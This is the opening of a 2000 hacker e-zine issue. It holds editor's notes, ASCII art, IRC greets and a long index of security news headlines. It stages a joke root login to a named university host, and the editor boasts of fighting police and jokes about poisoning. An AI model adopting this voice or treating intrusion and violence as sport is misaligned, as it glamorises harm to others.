20-NOV-2000 SR500 -- SR Telecom -- V4.9 *13:19:31 User name : Log-in menu User name :HWA Password :0WNZU YYZ NOV 200 REV B =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=- == <=-[ HWA.hax0r.news ]-=> == =================================================================== [=HWA 2000=] Number 56 Volume 2 Issue *666 *May-Nov 2000 == =================================================================== *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS *** *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS *** NOV 22 2000 NOV 22 2000 NOV 22 2000 NOV 22 2000 Dates are askew, and its a bit jumbled, normal service will resume shortly, please take a seat and stand back from the doors. #57 is already in progress and in more order, we'll back track later if it is possible and fill in the gap in the history coverage a LOT has happened not covered in this issue, excuse the mess. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Unix Guru Sex; "" talk;touch;finger;unzip;strip;mount;fsck;more;fsck;fsck;more;yes;yes; more;fsck;fsck;yes;yes;yes;umount;sleep "" ... Possible errors; aborted;child process killed;warning rogue children I/O error: device too small module not found: insmod penis tnx to PP/M/#??? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS *** *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS *** *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS *** You have connected from: r00t3d@well.some.highspeed.net For assistance call 864-0110 or to report network problems call 864-0200 Login as 'kufacts' for access to the Campus Wide Information System. 'lynx' for access to the World Wide Web using Lynx. 'www' for access to the World Wide Web using Lynx. 'linemode' for access to the World Wide Web using Line Mode. 'history' for history network resources. 'ex-ussr' for former Soviet Union info. At password prompt hit enter. Digital UNIX (raven.cc.ukans.edu) (ttyp0) login: root Password: Last successful login for kufacts: Sat Oct 23 13:52:10 2000 from is-nulab-pc14.unl.edu Last unsuccessful login for kufacts: Fri Apr 11 21:28:26 2000 on ttyp6 Your Terminal type is unknown! Enter a terminal type: [vt100] TERMINAL TYPE IS SET TO vt100 The University of Kansas raven. Connection closed by foreign host. # _ [15:59] Unexpected socket error: 10038, SSHSocketv2.cpp: 305 [16:00] are there expected errors? [X] Anarchist party (sic) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=- == <=-[ HWA.hax0r.news ]-=> == =================================================================== [=HWA 2000=] Number 56 Volume 2 Issue *666 *May-Nov 2000 == =================================================================== "ABUSUS NON TOLLIT USUM" *666 READ NOTES ON COVERAGE AND THE HIATUS BELOW =================================================================== "ABANDON HOPE ALL YE WHO ENTER HERE..." - dante's inferno "because if big brother isn't looking after us, civilization will cease to exist. Or something." - someone ud$$$**$$$$$$$bc. u@**" 4$$$$$$$Nu J ""#$$$$$$r @ $$$$b .F ^*3$$$ :% 4 J$$$N $ :F :$$$$$ 4F 9 J$$$$$$$ 4$ k 4$$$$bed$$$$$$$$$ $$r 'F $$$$$$$$$$$$$$$$$r $$$ b. $$$$$$$$$$$$$$$$$N $$$$$k 3eeed$$b $$$Euec."$$$$$$$$$ .@$**N. $$$$$" $$$$$$F'L $$$$$$$$$$$ $$$$$$$ :$$L 'L $$$$$ 4$$$$$$ * $$$$$$$$$$F $$$$$$F edNc @$$$$N ^k $$$$$ 3$$$$*% $F4$$$$$$$ $$$$$" d" z$N $$$$$$ ^k '$$$" #$$$F .$ $$$$$c.u@$$$ J" @$$$$r $$$$$$$b *u ^$L $$ $$$$$$$$$$$$u@ $$ d$$$$$$ ^$$$$$$. "NL "N. z@* $$$ $$$$$$$$$$$$$P $P d$$$$$$$ ^"*$$$$b '*L 9$E 4$$$ d$$$$$$$$$$$" d* J$$$$$r ^$$$$u '$. $$$L "#" d$$$$$$".@$$ .@$" z$$$$*" ^$$$$. ^$N.3$$$ 4u$$$$$$$ 4$$$ u$*" z$$$" '*$$$$$$$$ *$b J$$$$$$$b u$$P $" d$$P #$$$$$$ 4$ 3*$"$*$ $"$'c@@$$$$ .u@$$$P "$$$$ ""F~$ $uNr$$$^&J$$$$F $$$$# "$$ "$$$bd$.$W$$$$$$$$F $$" ?k ?$$$$$$$$$$$F'* 9$$bL z$$$$$$$$$$$F $$$$ $$$$$$$$$$$$$ '#$$c '$$$$$$$$$" .@"#$$$$$$$$$$$$b z* $$$$$$$$$$$$N. e" z$$" #$$$k '*$$. .u* u@$P" '#$$c "$$c u@$*""" d$$" "$$$u ^*$$b. :$F J$P" ^$$$c '"$$$$$$bL d$$ .. @$# #$$b '#$ 9$$$$$$b 4$$ ^$$k '$ "$$6""$b u$$ '$ d$$$$$P '$F $$$$$" ^b ^$$$$b$ '$W$$$$" 'b@$$$$" ^$$$* Gilo95' NOTE ABOUT THIS RELEASE: *666 >>>READ<<<< ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There has been just MUCH too much stuff released to possibly cover but we'll try if time permits, maybe if i end up in jail i'll use the time to complete archives of back issues on my assault charges. sigh... NOTE#1 ORIGINAL PLAN: (Is this it? :[ ] YES [ X] NO ) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ OUR LAST RELEASE was number 53 Volume 2 Issue 5 so we will be releasing TWO versions in a short time, one will be old news near the date of our last release (this one) the other will be NEW news (current material) the GAP? will be filled in later so issues 54 and probably 57 will be released close to gether with the gap we missed during the archive's hiatus covered at a LATER DATE (hopefully, thats the plan anyways.). NOTE#2 POSSIBLY WHAT YOU ARE READING:(Or is it this? [ X] YES [ ] NO) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ IT IS POSSIBLE YOU ARE HOLDING A HALLOWEEN HELLBOUND VERSION THAT WILL BE AN UNOFFICIAL OR INCOMPLETE COMPENDIUM OF PAST EVENTS *WITH* THE GAP IN COVERAGE, (U'LL KNOW UNLESS YER DUMB OR BORED IN WHICH CASE THIS IS ALL MOOT) IF SUCH IS THE CASE YOU"LL SEE OLD NEWS A WEIRD GAP OF MASSIVE PROPORTIONS (MONTHS) AND THEN BOOM, RECENT AND INTERESTING (PRESUMEABLY) MATERIAL NEAR THE MIDDLE OR END. GOOD LUCK KNOWLEDGE SEEKER, IT IS ALL HERE IF YOU LOOK DEEP ENOUGH, SADLY OLD URLS DIE QUICKLY (ANOTHER GOOD REASON FOR A WORK SUCH AS THIS) SO YOU MAY JUST GET THE HNN SNIPPETS OR HNS WRITEUPS BUT NOT THE FULL ARTICLES TO WHICH YOU ARE ACCUSTOMED.MY APPOLOGIES FOR THE MESS AND INDECISION, I AIM TO PLEASE AS MANY PPL AS POSSIBLE (MAINLY ME) AND THEREFORE NO GUARENTEES ARE IMPLIED AS TO THE TIMELINESS OR CONSISTENCY OF CONTENT. SUGGEST YOU ENJOY WHAT IS HERE AND DONT COMPLAIN. :-O RAMBLINGS OF SOME IMPORTANCE (PROBABLY SHOULD READ EM) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Once again although referred to as a 'Zine' this is in fact a chronicle or archive of events for any given time period starting in 1998 and following through to present hence my willingness to release issues in such a weird staggered manner. Get over it, you'll live. This has several aspects of a zine, some original content (minor) some exclusive interviews, and logs that will not be found elsewhere but it's main purpose for being IS and ALWAYS HAS BEEN to act as a reference work covering as much of the underground and borderline security group releases as possible (the 'zine' is mostly a one man job and therefore seldom complete or covering items as extensively as i'd like) it tends to be an overwhelming and large work whenever it is undertaken but the releases are enjoyed by many making it worth my effort (i'm doing this mainly for my own purposes still btw) and those few dissenters that do emerge are either jealous, people turned down for membership in the HWA group or just plain "dont get it" and can in fact fuck off and die for all I care petulant children and those of bloated egos... Anyway with that nonesense said and this little minor irritation and this explanation out of the way please read on and enjoy what content i've decided to include this issue, including releases from the newly formed HWA Security team (main reason for the hiatus) and check our new site often as a new format is due to be implemented and many new projects of wonder and awe are in the works to be released, check it often and your input in all aspects of our group endeavours are encouraged. We currently number 27 in official active members these are NOT currently (soon) involved in producing this work but I intend to bring some that are of like mind on board to help produce this monstrosity and terrorise small children and sysadmins for many a year to come. - Dribbled from Cruci's mind Oct 30th 2000 P.S Do you like how i fluctuate the number of idents from issue to issue? I dont but it annoys some people and I take pleasure in their squirming. Sorry for those caught in the cross fire. RECENT EVENTS: (FACT or FICTION? only the chosen KNOW for sure) ~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ RECENT FACTORS AFFECTING THE WAY THIS WAS PRODUCED: Sept 23rd FPROPHET AND DICENTRA TIED THE KNOT and got married, congrats! same nite:Cruciphux goes to jail charged with assault police officer and disturbing the peace (k i got drunk and some peopl hassled me coz of my purple hair i ended up fighting three cops and paying the price.) 24hrs in jail, more time in jail likely when trial is over (i beat up three cops, sigh, NOI recommended people.) Sometime digitized pic of Cruci after his beating by the cops is circulated among select people on EFnet.NO you cant request a copy.I'm not proud of what happened it was a fuck up. I fought the law and the law won... Sept 26th Cruci in hospital for a week with infected arm (dont ask) another dumb incident, drugs are bad kiddies stick to pez and beer! Oct 30th Court date: put over to Nov 20th possibility of no jail and merely probation although one officer almost had his leg broken. (Oh ya dont get on my bad side) Oct 31st Arranged poison and razor blades ready for Halloween night and the black mass held each samhain in my coven (not). Nov 20th Cruci faced 2yrs in jail and $2000 CDN fine but thanks to a good lawyer and due to adult situational extenuating circumstances recieved a suspended sentence and 18 months probation. More details? dont ask. Be nice to cops kids, be sure those ppl in plain clothes aren't the fuzz! ~~~~~~~~ _ _ _ __ _ _ __ _ _ _ ___ _ ~~~~~~~~~~~~~~~~~~~~~~ Inspirational music: NiN, Marilyn Manson, Killdozer movies: Not the Ninth Gate Not mission to mars maybe The Haunting The Exorcist, Pitch Black See a trend? ~~~~~~~~ _ _ _ __ _ _ __ _ _ _ ___ _~~~~~~~~~~~~~~~~~~~~~~~ [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] ____ _ ____ _____ _ _ _____ _ _ | _ \ / \ | _ \| ____| \ | |_ _|/ \ | | | |_) / _ \ | |_) | _| | \| | | | / _ \ | | | __/ ___ \| _ <| |___| |\ | | |/ ___ \| |___ |_| /_/ \_\_| \_\_____|_| \_| |_/_/ \_\_____| _ ______ _____ ____ ___ ______ __ / \ | _ \ \ / /_ _/ ___| / _ \| _ \ \ / / / _ \ | | | \ \ / / | |\___ \| | | | |_) \ V / / ___ \| |_| |\ V / | | ___) | |_| | _ < | | /_/ \_\____/ \_/ |___|____/ \___/|_| \_\|_| __ ___ / |( _ ) _ | |/ _ \ _| |_ | | (_) |_ _| |_|\___/ |_| [ WARNING ] [ HALLOWEEN/XMAS EDITION 2000 ] [ EXPLICIT CONTENT ] [ THIS PRODUCT MAY BE HARMFUL OR FATAL IF INFO IS USED ] [ BY YOUNG SCRIPT KIDDIES TO ATTACK OR COMPROMISE SERVERS ] [ DO NOT INTENTIONALLY CONCENTRATE AND INHALE PRODUCT. ] [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] _ _ _______ __ | \ | | ____\ \ / / | \| | _| \ \ /\ / / | |\ | |___ \ V V / _|_| \_|_____|__\_/\_/__ __ | _ \ / _ \| __ ) / _ \ \/ / | |_) | | | | _ \| | | \ / | __/| |_| | |_) | |_| / \ |_| \___/|____/ \___/_/\_\ [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] WE HAVE AN UPDATED MAIL DROP ADDRESS: HWA P.O BOX 44118 POSTAL OUTLET UNIT #9 ONE WEXFORD ROAD BRAMPTON, ONTARIO CANADA L6Z 4V7 [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] PRELUDE ~~~~~~~ On a popular breakfast cereal: The reason it's called "Grape Nuts" is that it contains "dextrose", which is also sometimes called "grape sugar", and also because "Grape Nuts" is catchier, in terms of marketing, than "A Cross Between Gerbil Food and Gravel", which is what it tastes like. - Dave Barry, "Tips for Writer's: .,-*-,._.,-*'^'~*-,._.,-*~> *1 <~*-,._.,-*~'^'~*-,._.,-*-,. HACKING sensibilities do not limit themselves to the realms of computer or telephone networks they also extend into art and musical expression I coaxed one of our members to share an exerpt of the lyrics from the title track of their latest cd release (translated from Croatian). - Ed .,-*-,._.,-*'^'~*-,._.,-*~> *1 <~*-,._.,-*~'^'~*-,._.,-*-,. "Narko" "U'r opening the window for a perfect day" "just like a scene from hollywood movies" "where luck goes in wawes" "where dust covers all the questions" "ooooo am I that old that U forget" "ooooois he that brawe that he takes U "that why there are words" "for U to lie with them to me" "that's why hope exsiste" "for say once again" "In my dreams I go to U" "In my dreams I always go to U" "In my dreams I alwaysgo to U" Pips, chips & Videoclips (c) 2000 ========================================================================== en·tro·py (ntr-p) n., pl. en·tro·pies. 1.Symbol S For a closed thermodynamic system, a quantitative measure of the amount of thermal energy not available to do work. 2.A measure of the disorder or randomness in a closed system. 3.A measure of the number of bits necessary to transmit a message as a function of the probability that the message will consist of a specific set of symbols. >>4.A hypothetical tendency for all matter and energy in the universe to evolve toward a state of inert uniformity. >>5.Inevitable and steady deterioration of a system or society. ____ _____ ____ ___ _ _ | __ )| ____/ ___|_ _| \ | | | _ \| _|| | _ | || \| | | |_) | |__| |_| || || |\ | |____/|_____\____|___|_| \_| [root@antiv0re]# whatis life life: nothing appropriate [root@antiv0re]# gcc -o god god.c [root@antiv0re]# ./god [root@antiv0re]# make clean [root@antiv0re]# make universe make: don't know how to make universe. Stop [root@antiv0re]# make dinner make: don't know how to make dinner. Stop [root@antiv0re]# Ok some greets... [08:54] Cruciphux: leave me greets in the zine [08:54] never dont it u gax0r [08:54] hax0r i mean [08:55] haha [08:55] yeah i did once [08:55] write: pr0ix still w8ing for the automatic k_____ [08:55] := [08:55] ) [08:55] i took all the greets out [08:55] yeah ok [08:55] thats fair [08:55] :) [08:55] where is it? sorry for bad grammar etc, i'm learnin a little tho.. ;) pr0ix: dont forget that automatic thingy! you'll get your kl33t HWA shirt ;) cpt: hiya man, stay the fuck out of trouble ok? you know what i mean. KrD: Thanks for the interview, hope things work out better than recent shit. potgirl : geia sou file mou ;) slash: sta ima buraz? pr0ix/pek/HET/Mixter/Trudel/#informatic #??? : Bleibt cool broders! pip/tnc: bottoms up lads! And the rest of #darknet, #hwa-security and some other chans i wont bother mentioning coz they dont need the publicity.,, _ _ | |__ (_) _ __ ___ ___ _ __ ___ | '_ \| | |'_ ` _ \ / _ \| '_ ` _ \ | | | | | || | | | | (_) | | | | | | |_| |_|_| || |_| |_|\___/|_| |_| |_| () =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= "If life is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] HWA.hax0r.news #666 2000 =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. LEGAL & COPYRIGHTS .............................................. 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. THIS IS WHO WE ARE .............................................. ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. SKULL ASCII: Giles@gevans.demon.co.uk (Gilo) ==SKuLL and CroSSBonES== Wargames:http://roothat.labs.pulltheplug.com/ =--------------------------------------------------------------------------= Source Keys HWA.hax0r.news 2000 =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown [MM] - Articles from Mass Media sources (Wired MSNBC Reuters etc) [IND] - Independant articles or unsolicited material. [HWA] - Articles or interviews by HWA Staff members [HNN] - Sourced from the Hacker News Network http://www.hackernews.com/ [HNS] - Sourced from Help Net Security http://net-security.org/ [403] - Sourced from 403-security http://www.403-security.net/ [ISN] - Articles from the ISN Mailing list (usually sourced from media) [b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/ [zsh] - ZSH release http://zsh.interniq.org/ [COR] - Correction to previous release. =--------------------------------------------------------------------------= Key Content HWA.hax0r.news 2000 =--------------------------------------------------------------------------= only a poor workman blames his tools, unless of course those tools were written by Microsoft :) lol 01.0 .. GREETS ........................................................... 01.1 .. Last minute stuff, rumours, newsbytes ............................ 01.2 .. Mailbag .......................................................... 02.0 .. From the Editor................................................... Note: Contents this issue are in particular disarray and follow no real time line sorry about this but you should find the content interesting and worth reading nonetheless...C*:. 03.0 .. [HNN] May 09'00 ILOVEYOU Investigation Continues 04.0 .. [HNN] May 09'00 Brace Yourselves For the SuperVirus 05.0 .. [HNN] May 09'00 NIPC Accused of Dragging Feet 06.0 .. [HNN] May 09'00 Classified Systems Hit 07.0 .. [HNN] May 09'00 Mitnick in Online Chat 08.0 .. [HNN] May 09'00 Phreakers In the White House 09.0 .. [HNN] May 09'00 MS vs Netscape in Blame for Security Hole 10.0 .. [HNN] May 09'00 Hacker vs. Cracker The Debate Continues 11.0 .. [HNN] May 10'00 Buffer Overflow: The Name Game: Groking the Love Bug 12.0 .. [HNN] May 10'00 New Virus/Worm On The Loose, Friendmess.A 13.0 .. [HNN] May 10'00 YTCracker Busted For Web Defacement 14.0 ,, [HNN] May 10'00 Gov Security Laws Introduced At Summit 15.0 .. [HNN] May 10'00 Internet Fraud Complaint Center Launched By DoJ 16.0 .. [HNN] May 10'00 And Yet Another Hole Found In Hotmail 17.0 .. [HNN] May 11'00 Solar Sunrise, Now on Video 18.0 .. [HNN] May 11'00 Network Manager Sent to Jail For Destroying His Network 19.0 .. [HNN] May 11'00 Lawmakers Upset Over ILOVEYOU 20.0 .. [HNN] May 11'00 Intel Motherboards Could Destroy Files 21.0 .. [HNN] May 11'00 Hackers and the Tools They Use 22.0 .. [HNN] May 11'00 HackerNews Brazil and SecureNet Forced To Remove Content 23.0 .. [HNN] May 12'00 ILOVEYOU May Have Been An Accident 24.0 .. [HNN] May 12'00 Windows Labeled 'Virus Friendly' 25.0 .. [HNN] May 12'00 PBS Looses Subscriber Info 26.0 .. [HNN] May 12'00 Anonymous User Sues Yahoo For Releasing Identity 27.0 .. [HNN] May 12'00 Smart Cards Labeled Secure 28.0 .. [HNN] May 12'00 Cyber Attackers on Television 29.0 .. [HNN] May 15'00 Love Bug Suspect Denies All 30.0 .. [HNN] May 15'00 Microsoft Found to Be Threat to National Security 31.0 .. [HNN] May 15'00 G8 to Discuss Cybercrime 32.0 .. [HNN] May 15'00 VA Described as Wide Open To Attack 33.0 .. [HNN] May 15'00 Bank Web Site Breached 34.0 .. [HNN] May 15'00 Koreans Host 'Hacking Contest' 35.0 .. [HNN] May 15'00 America's Most Wanted Hit with DoS 36.0 .. [HNN] May 15'00 Greisling Responds 37.0 .. [HNN] May 17'00 Microsoft Security Spanked Again 38.0 .. [HNN] May 17'00 Canada's Big Brother Revealed 39.0 .. [HNN] May 17'00 Code on Disk Points Finger At Suspect 40.0 .. [HNN] May 17'00 List of ILOVEYOU Suspects Grows 41.0 .. [HNN] May 17'00 Return of the Phreaker 42.0 .. [HNN] May 17'00 Hope 2000 Announces Plans 43.0 .. [HNN] May 17'00 More and more E-zines 44.0 .. [HNN] May 18'00 UCITA May Help Computer Attackers 45.0 .. [HNN] May 18'00 H.R.3489 To Limit Eavesdropping 46.0 .. [HNN] May 18'00 Congressional Records Reveals Officers Social Security Numbers 47.0 .. [HNN] May 18'00 G8 Finds No Quick Fix For Cyber Crime 48.0 .. [HNN] May 18'00 Philippines Has No CyberCrime Law - Suspect Can Not be Prosecuted 49.0 .. [HNN] May 18'00 Multiple Holes Found in Kerberos 50.0 .. [HNN] May 18'00 Interview with OpenBSD Creator 51.0 .. [HNN] May 18'00 RIAA Looking For Targets 52.0 .. [HNN] May 18'00 Canadian BB DB Clippings 53.0 .. [HNN] May 19'00 NewLove - Dangerous Variant on the Loose 54.0 .. [HNN] May 19'00 Old CIA Head Warns of Spy-Viruses 55.0 .. [HNN] May 19'00 Fed Slow In Virus Reaction 56.0 .. [HNN] May 19'00 FCC's Attempted Expansion of CALEA In Court 57.0 .. [HNN] May 19'00 Russian Computer Crime on the Rise 58.0 .. [HNN] May 19'00 J0n Pleads Guilty in Canada 59.0 .. [HNN] May 19'00 Electronically Attacking a Bank 60.0 .. [HNN] May 22'00 NAI Removes NetBus Pro from Scanner 61.0 .. [HNN] May 22'00 Brits Lose Another Laptop 62.0 .. [HNN] May 22'00 State Department Audits Missing Laptops 63.0 .. [HNN] May 22'00 Researchers Develop New Breed of Security Tool 64.0 .. [HNN] May 22'00 Original ILOVEYOU Author Surfaces in Australia 65.0 .. [HNN] May 23'00 Secret Searches Reintroduced to Congress 66.0 .. [HNN] May 23'00 FTC Wants Control Over Privacy 67.0 .. [HNN] May 23'00 Computer Attackers To get Even Higher Sentences 68.0 .. [HNN] May 23'00 Australia Loses Sensitive Laptops 69.0 .. [HNN] May 23'00 Hong Kong to Create Cyber Response Team 70.0 .. [HNN] May 23'00 South Africa Forms CyberCrime Unit 71.0 .. [HNN] May 24'00 Info-Con Ratings To Be Used for Cyber Threats 72.0 .. [HNN] May 24'00 Ticketmaster to Sell RootFest Tickets 73.0 .. [HNN] May 24'00 Zero-Knowledge Teams With IBM 74.0 .. [HNN] May 24'00 The Little Miscreants That Could 75.0 .. [HNN] May 24'00 French Say No Anonymity on Web 76.0 .. [HNN] May 24'00 Experts Stress Education Over Laws 77.0 .. [HNN] May 25'00 NHL Hit with DDoS 78.0 .. [HNN] May 25'00 FCC Rules Under Appeal 79.0 .. [HNN] May 25'00 Privacy Issue Still Hot In DC 80.0 .. [HNN] May 25'00 Australia Electoral Information Sold For Tax Mailing 81.0 .. [HNN] May 25'00 Cybercops Meet in Boston 82.0 .. [HNN] May 25'00 CERT Releases Advisory on Week Old Issue 83.0 .. [HNN] May 26'00 Physical Security Is Real Weak 84.0 .. [HNN] May 26'00 Reno Does About Face 85.0 .. [HNN] May 26'00 Extortionist Busted 86.0 .. [HNN] May 26'00 Australian Man Leaks Sewage Via Computer and Radio 87.0 .. [HNN] May 26'00 2600 Keeps Lawyer 88.0 .. [HNN] May 26'00 Preliminary Defcon Speaking Schedule 89.0 .. [HNN] May 26'00 Underground Site Form Alliance 90.0 .. [HNN] May 30'00 Viruses, Viruses, and more Viruses 91.0 .. [HNN] May 30'00 Resume on the Loose 92.0 .. [HNN] May 30'00 Gauntlet Firewall Breached 93.0 .. [HNN] May 30'00 Software Glitch Short Changes Lottery Winners 94.0 .. [HNN] May 30'00 Cyberstalking: Hype or Reality 95.0 .. [HNN] May 30'00 Sexy Geeks and Hackers 96.0 .. [HNN] May 30'00 DC Metro Web Site Defaced 97.0 .. [HNN] May 30'00 Mitnick to Challenge Computer Ban 98.0 .. [HNN] May 30'00 Black Hat Posts Speaker Lists, Adds Old Video Clips 99.0 .. [IND] Pokemon virus hits U.S targetting kids 100.0 .. [HNN] May 31'00 Canada To Dismantle Big Bro Database 101.0 .. [HNN] May 31'00 Resume Causes Little Damage 102.0 .. [HNN] May 31'00 Hong Kong Pirate Piracy Troubles 103.0 .. [HNN] May 31'00 New Zealand Man Claims Virus Info Stolen 104.0 .. [HNN] May 31'00 Bank Manager Executed 105.0 .. [HNN] May 31'00 Malaysian ISP Suffers Human Error Security Breach 106.0 .. [HNN] May 31'00 Defcon Updates Web Site 107.0 .. [HNN] May 31'00 SWAT Hits Issue 29 108.0 .. [HNN] June 01'00 Pennsylvania Passes Anti-Virus Law 109.0 .. [HNN] June 01'00 MLB Practices Security Through Obscurity 110.0 .. [HNN] June 01'00 Pr0n Detection Software 111.0 .. [HNN] June 01'00 Fighting the Privacy Bootleggers 112.0 .. [HNN] June 01'00 Marcia Clark Calls Hackers "Undersocialized Schizoids" 113.0 .. [HNN] June 01'00 Fake Census Takers on the Prowl 114.0 .. [HNN] June 02'00 Top Ten Internet Security Problems 115.0 .. [HNN] June 02'00 MPAA Attempts to Bar Press From Hearings 116.0 .. [HNN] June 02'00 Anti-Virus Vendors Blame Media for Virus Hype 117.0 .. [HNN] June 02'00 Summercon 2000 118.0 .. [HNN] June 02'00 India's First Cyber Criminal Arrested 119.0 .. [HNN] June 02'00 Libnet for NT Now Available 120.0 .. [HNN] June 05'00 FW-1 Vulnerable to Fragmented Packets 121.0 .. [HNN] June 05'00 Australian Tax Office Sells Private Info 122.0 .. [HNN] June 05'00 British Have Lost Dozens of Laptops 123.0 .. [HNN] June 05'00 S.2448 Analysis 124.0 .. [HNN] June 05'00 Spammer Busted For Online Tampering 125.0 .. [HNN] June 05'00 Cell Phone Viruses? 126.0 .. [HNN] June 07'00 SPAM Worm Hits Cell Phones In Spain 127.0 .. [HNN] June 07'00 MafiaBoy to Get New Charges 128.0 .. [HNN] June 07'00 CheckPoint Posts Temp Fix for FW-1 Vulnerability 129.0 .. [HNN] June 07'00 Air Force Blocks Access to Museum Web Site 130.0 .. [HNN] June 07'00 Mounties Fall Behind Crooks in Online Crime 131.0 .. [HNN] June 08'00 Accused in ILOVEYOU virus case set free 132.0 .. [HNN] June 08'00 Kevin Mitnick Talks About Jobs in Computer Security 133.0 .. [HNN] June 08'00 Australia passes law legalizing government computer intrusions 134.0 .. [HNN] June 08'00 Press allowed to cover MPAA depositions 135.0 .. [HNN] June 08'00 Vulnerability in free mail services found 136.0 .. [HNN] June 08'00 OnStar service can unlock car doors 137.0 .. [HNN] June 09'00 Thousands of trojaned computers found 138.0 .. [HNN] June 09'00 Investigative Report: Female Hackers 139.0 .. [HNN] June 09'00 ISS founder is a white hat hacker 140.0 .. [HNN] June 09'00 80,000 DNS Domain Server Vulnerable 141.0 .. [HNN] June 09'00 Lewis Koch on Winn Schwartau 142.0 .. [HNN] June 09'00 Television takes on computer crime 143.0 .. [HNN] June 09'00 Top 50 Security Tools Survey 144.0 .. [HNN] June 12'00 NETSEC Discovers Nothing New 145.0 .. [HNN] June 12'00 Brazilian Telephone Users Privacy Breached 146.0 .. [HNN] June 12'00 Dozens of Malaysian Sites Defaced 147.0 .. [HNN] June 12'00 Return of FidNet 148.0 .. [HNN] June 12'00 H2K Update: Movie Premier, Speaker List 149.0 .. [HNN] June 12'00 Another ILOVEYOU Variant Found 150.0 .. [HNN] June 12'00 Radio Interferer Gets Five Years 151.0 .. [HNN] June 12'00 Indonesian Arrested in Australia For Attacking Singapore 152.0 .. [HNN] June 12'00 Evidence to Support Cell Phone Ban Now Available 153.0 .. [HNN] June 13'00 Hard Drives With Nuke Secrets Disappear 154.0 .. [HNN] June 13'00 Police Stumble onto Pirates 155.0 .. [HNN] June 13'00 Social Aspects of the Love Bug 156.0 .. [HNN] June 13'00 Interview with Bruce Schneier 157.0 .. [HNN] June 13'00 IC-Crypt 128 Goes Freeware 158.0 .. [HNN] June 13'00 IronBox Releases New Articles 159.0 .. [HNN] June 13'00 Hong Kong Government Defaced, Again 160.0 .. [HNN] June 14'00 RootFest Opens Today 161.0 .. [HNN] June 14'00 Email Hoax Panics Credit Card Holders 162.0 .. [HNN] June 14'00 FAA Fails to Conduct Background Checks on Computer Contractors 163.0 .. [HNN] June 14'00 @stake Announces Technical Advisory Board 164.0 .. [HNN] June 14'00 Site Forced to Hand Over User Identities 165.0 .. [HNN] June 14'00 ITN Email Compromised 166.0 .. [HNN] June 15'00 Philippine President Signs Computer Crime Law 167.0 .. [HNN] June 15'00 MPAA vs 2600 Transcripts Released 168.0 .. [HNN] June 15'00 Raytheon Unveils SilentRunner 169.0 .. [HNN] June 15'00 30 year Old Security Report Still Useful 170.0 .. [HNN] June 15'00 15 yr old Receives Classified Documents 171.0 .. [HNN] June 15'00 Underground Tools 172.0 .. [HNN] June 16'00 Political Candidates Deface Web Pages 173.0 .. [HNN] June 16'00 Mitnick Seeks to Renew Ham License 174.0 .. [HNN] June 16'00 Value of Microsoft Trash On the Rise 175.0 .. [HNN] June 16'00 China Sentences Man to Death 176.0 .. [HNN] June 16'00 OpenBSD 2.7 Now Available 177.0 .. [HNN] June 16'00 RootFest Ends Today 178.0 .. [HNN] June 16'00 White Paper: Internet Identity Theft 179.0 .. [HNN] June 16'00 New Ezines 180.0 .. [HNN] June 19'00 AOL Confirms Compromise 181.0 .. [HNN] June 19'00 College of Dupage Make Unfounded Claims Regarding CyberCop School 182.0 .. [HNN] June 19'00 Los Alamos Hard Drives Found 183.0 .. [HNN] June 19'00 Japanese Exercise CyberCrime Law 184.0 .. [HNN] June 19'00 Anti Pedophile Groups Take on the Net 185.0 .. [HNN] June 19'00 More E-Zines 186.0 .. [HNN] June 20'00 Stages Virus Starts to Become Widespread 187.0 .. [HNN] June 20'00 Employees Sue Employer For Firing Over NetBus 188.0 .. [HNN] June 20'00 The Cyberterror Scare of 2000 189.0 .. [HNN] June 20'00 AOL Increases Network Security 190.0 .. [HNN] June 20'00 Poll Says Americans Are Afraid of CyberCrime 191.0 .. [HNN] June 20'00 Cyber Defense Still Looked at As Part of 